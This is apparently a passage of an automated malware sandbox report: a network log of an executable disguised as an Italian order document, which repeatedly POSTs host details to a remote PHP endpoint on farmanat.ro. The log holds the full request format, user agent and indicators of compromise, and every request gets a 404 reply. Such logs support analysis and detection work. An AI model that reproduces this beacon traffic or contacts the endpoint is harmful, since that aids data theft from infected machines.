                                              Nov 25, 2021 10:54:19.768616915 CET7329OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:19.819405079 CET7329INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:18 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              734192.168.11.2050582176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:20.196223974 CET7330OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:20.230559111 CET7330OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:20.289083004 CET7331INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:19 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              735192.168.11.2050583176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:20.692030907 CET7331OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:20.725589037 CET7332OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:20.783749104 CET7332INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:19 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              736192.168.11.2050584176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:21.190323114 CET7333OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:21.223855972 CET7333OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:21.293025017 CET7333INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:20 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              737192.168.11.2050585176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:21.687268019 CET7334OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:21.721350908 CET7334OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:21.770921946 CET7335INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:20 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              738192.168.11.2050586176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:22.210906029 CET7335OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:22.244421959 CET7336OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:22.301152945 CET7336INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:21 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              739192.168.11.2050587176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:22.705040932 CET7337OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:22.739272118 CET7337OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:22.796283007 CET7337INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:21 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              74192.168.11.2049911176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:47.685832024 CET6418OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:47.719325066 CET6418OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:47.774413109 CET6419INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:46 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              740192.168.11.2050588176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:23.229444981 CET7338OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:23.263679028 CET7338OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:23.315236092 CET7339INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              741192.168.11.2050589176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:23.722718000 CET7339OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:23.756190062 CET7340OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:23.806195021 CET7340INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:22 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              742192.168.11.2050590176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:24.176004887 CET7341OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:24.210030079 CET7341OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:24.267311096 CET7341INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:23 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              743192.168.11.2050591176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:24.687768936 CET7342OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:24.721345901 CET7342OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:24.774898052 CET7343INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:23 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              744192.168.11.2050592176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:25.208925962 CET7343OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:25.242980957 CET7344OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:25.299103975 CET7344INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:24 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              745192.168.11.2050593176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:25.717248917 CET7345OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:25.750817060 CET7345OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:25.801876068 CET7345INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:24 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              746192.168.11.2050594176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:26.227736950 CET7346OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:26.261358023 CET7346OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:26.314987898 CET7347INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:25 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              747192.168.11.2050595176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:26.656063080 CET7347OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:26.690289021 CET7348OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:26.741338968 CET7348INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:25 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              748192.168.11.2050596176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:27.183294058 CET7349OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:27.217629910 CET7349OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:27.268580914 CET7349INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:26 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              749192.168.11.2050597176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:27.683854103 CET7350OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:27.717432022 CET7350OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:27.766393900 CET7351INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:26 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              75192.168.11.2049912176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:48.224669933 CET6419OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:48.259001017 CET6420OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:48.313889027 CET6420INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:47 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              750192.168.11.2050598176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
